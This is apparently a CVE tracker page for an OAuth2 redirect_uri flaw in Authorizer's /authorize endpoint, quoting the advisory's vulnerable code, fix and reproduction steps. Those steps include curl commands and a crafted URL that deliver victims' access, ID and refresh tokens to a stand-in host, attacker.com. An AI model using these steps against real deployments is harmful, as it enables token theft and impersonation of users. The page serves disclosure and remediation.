CVE-2026-54072

CRITICALPre-NVD 9.39.3
EchelonGraph scoreLOW confidence

This critical-severity CVE scores 9.3 under the CNA's CVSS (NVD's own analysis pending). EPSS exploit-prediction score not yet available (the EPSS model rescores nightly; freshly-published CVEs typically appear within 48 hours). GitHub Security Advisory data not yet ingested — confidence will rise once GHSA publishes (typical lag: hours to days for open-source ecosystem CVEs; never for infrastructure-only CVEs).

Triggered by: NVD CVSS baseline
Sources: cna:github_m
9.3
EchelonGraph verdictPlan a fixSerious severity, but no confirmed exploitation yet.
  • High severity, but no confirmed exploitation yet
CISA-KEV: Not listedEPSS: CVSS: 9.3Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

Authorizer: Unvalidated redirect_uri in /authorize leaks OAuth2 tokens to attacker-controlled URL

Summary

The /authorize endpoint accepts any redirect_uri without validating it against AllowedOrigins. When response_type=token or response_type=id_token, the server appends access_token, id_token, and refresh_token as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required client_id from the public /graphql?query={meta{client_id}} endpoint.

Partial fix was applied in v2.0.1 to other handlers (oauth_login, verify_email, magic_link_login, forgot_password, invite_members, oauth_callback) but /authorize was not included.

Vulnerable Code

internal/http_handlers/authorize.go:

redirectURI := strings.TrimSpace(gc.Query("redirect_uri"))
// ... no IsValidOrigin() call ...
// response_type=token path (line ~263):
if strings.Contains(redirectURI, "?") {
    redirectURI = redirectURI + "&" + params
} else {
    redirectURI = redirectURI + "?" + params
}
handleResponse(gc, responseMode, authURL, redirectURI, ...) // 302 to attacker URL

Compare with the fixed oauth_login.go in v2.0.1 which calls validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins).

Steps to Reproduce

# 1. Obtain client_id (no authentication required)
CLIENT_ID=$(curl -s http://TARGET/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{meta{client_id}}"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['meta']['client_id'])")

echo "client_id: $CLIENT_ID"

2. Craft the malicious URL and send to victim (victim must be logged in)

When victim opens this URL, tokens are delivered to attacker.com

MALICIOUS_URL="http://TARGET/authorize?response_type=token&client_id=${CLIENT_ID}&redirect_uri=https://attacker.com/steal&scope=openid+profile+email&state=x&response_mode=query"

echo "Send to victim: $MALICIOUS_URL"

3. Attacker receives 302 redirect with all tokens:

https://attacker.com/steal?access_token=eyJ...&token_type=bearer&expires_in=...&id_token=eyJ...

4. Validate stolen token

curl -s http://TARGET/userinfo \ -H "Authorization: Bearer STOLEN_ACCESS_TOKEN"

Returns: {"email":"[email protected]","id":"...","roles":["user"]}

Impact

An attacker who tricks a logged-in user into clicking a crafted link can steal the victim's access_token, id_token, and refresh_token. The attacker can then impersonate the victim for the full token lifetime. No user interaction beyond clicking the link is required; the victim's browser issues the redirect automatically.

Proposed Fix

Add the same IsValidOrigin check that was applied to the other handlers in v2.0.1:

// In authorize.go, after reading redirect_uri:
if !validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins) {
    handleResponse(gc, responseMode, authURL, redirectURI, map[string]interface{}{
        "error":             "invalid_request",
        "error_description": "redirect_uri is not allowed",
    }, http.StatusBadRequest)
    return
}

CVSS v3
9.3
EG Score
9.3(low)
EPSS
KEV
Not listed

Published

July 10, 2026

Last Modified

July 10, 2026

Vendor Advisories for CVE-2026-54072(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Data Freshness Timeline

(refreshed 33× in last 7d / 33× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-15 21:42 UTCEG score recompute
  2. 2026-07-15 17:54 UTCEG score recompute
  3. 2026-07-15 14:07 UTCEG score recompute
  4. 2026-07-15 10:19 UTCEG score recompute
  5. 2026-07-15 06:31 UTCEG score recompute
  6. 2026-07-15 02:43 UTCEG score recompute
  7. 2026-07-14 22:55 UTCEG score recompute
  8. 2026-07-14 19:07 UTCEG score recompute
  9. 2026-07-14 15:19 UTCEG score recompute
  10. 2026-07-14 11:31 UTCEG score recompute
  11. 2026-07-14 07:43 UTCEG score recompute
  12. 2026-07-14 03:53 UTCEG score recompute
  13. 2026-07-14 00:06 UTCEG score recompute
  14. 2026-07-13 20:19 UTCEG score recompute
  15. 2026-07-13 16:31 UTCEG score recompute
  16. 2026-07-13 12:42 UTCEG score recompute
  17. 2026-07-13 08:55 UTCEG score recompute
  18. 2026-07-13 05:07 UTCEG score recompute
  19. 2026-07-13 01:18 UTCEG score recompute
  20. 2026-07-12 21:31 UTCEG score recompute
  21. 2026-07-12 17:43 UTCEG score recompute
  22. 2026-07-12 13:56 UTCEG score recompute
  23. 2026-07-12 10:08 UTCEG score recompute
  24. 2026-07-12 06:21 UTCEG score recompute
  25. 2026-07-12 02:33 UTCEG score recompute
Show 8 more
  1. 2026-07-11 22:46 UTCEG score recompute
  2. 2026-07-11 18:59 UTCEG score recompute
  3. 2026-07-11 15:12 UTCEG score recompute
  4. 2026-07-11 11:24 UTCEG score recompute
  5. 2026-07-11 07:36 UTCEG score recompute
  6. 2026-07-11 03:47 UTCEG score recompute
  7. 2026-07-10 23:59 UTCEG score recompute
  8. 2026-07-10 20:12 UTCEG score recompute

Frequently asked(4)

What is CVE-2026-54072?
CVE-2026-54072 is a critical vulnerability published on July 10, 2026. Authorizer: Unvalidated redirect_uri in /authorize leaks OAuth2 tokens to attacker-controlled URL Summary The /authorize endpoint accepts any redirecturi without validating it against AllowedOrigins. When responsetype=token or responsetype=idtoken, the server appends accesstoken, idtoken, and…
When was CVE-2026-54072 disclosed?
CVE-2026-54072 was first published in the National Vulnerability Database on July 10, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-54072?
CVE-2026-54072 has a CVSS v4.0 base score of 9.3 (CNA self-assessment; NVD's own analysis pending). The EG score is currently aggregating — additional source signals are being incorporated as they become available..
How do I remediate CVE-2026-54072?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-54072, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-54072

Explore →

Is Your Infrastructure Affected by CVE-2026-54072?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.